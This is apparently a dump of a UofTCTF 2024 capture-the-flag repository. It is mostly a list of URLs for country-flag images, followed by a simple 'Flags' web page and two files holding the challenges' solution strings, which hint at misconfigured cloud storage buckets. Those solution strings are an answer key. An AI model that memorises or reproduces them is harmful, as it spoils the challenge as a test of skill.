https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/mx.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/my.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/my.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/mz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/mz.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/na.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/na.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/nc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/nc.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ne.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ne.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/nf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/nf.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ng.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ng.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ni.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ni.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/nl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/nl.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/no.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/no.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/np.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/np.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/nr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/nr.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/nu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/nu.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/nz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/nz.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/om.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/om.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/pa.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/pa.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/pe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/pe.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/pf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/pf.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/pg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/pg.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ph.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ph.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/pk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/pk.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/pl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/pl.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/pm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/pm.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/pn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/pn.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/pr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/pr.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ps.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ps.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/pt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/pt.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/pw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/pw.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/py.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/py.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/qa.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/qa.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/re.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/re.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ro.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ro.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/rs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/rs.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ru.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ru.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/rw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/rw.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sa.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sa.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sb.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sc.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sd.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/se.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/se.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sg.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sh.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/si.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/si.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sj.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sj.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sk.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sl.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sm.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sn.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/so.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/so.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sr.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ss.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/st.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/st.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sv.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sx.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sy.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/sz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/sz.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tc.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/td.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/td.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tf.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tg.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/th.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/th.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tj.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tj.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tk.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tl.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tm.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tn.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/to.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/to.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tr.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tt.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tv.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tw.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/tz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/tz.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ua.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ua.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ug.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ug.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/um.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/um.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/us.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/us.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/uy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/uy.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/uz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/uz.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/va.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/va.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/vc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/vc.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ve.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ve.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/vg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/vg.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/vi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/vi.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/vn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/vn.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/vu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/vu.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/wf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/wf.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ws.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ws.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/xa.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/xa.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/xk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/xk.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ye.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ye.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/yt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/yt.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/za.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/za.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/zm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/zm.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/zw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/zw.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/flag: -------------------------------------------------------------------------------- 1 | uoftctf{s3rv1c3_4cc0un75_c4n_83_un54f3} -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket/chal/secret/dont_show: -------------------------------------------------------------------------------- 1 | uoftctf{allUsers_is_not_safe} -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket/chal/src/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | Flags 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 |

Flags

24 | 25 |

I love flags!

26 | 27 |

I collect flags from all around the world. Here are some of my recent finds:

28 | 29 |

here's a flag i got while on a trip to antwerp!!

30 |

31 | 32 |

and here’s a flag from Guam:

33 |

34 | 35 |
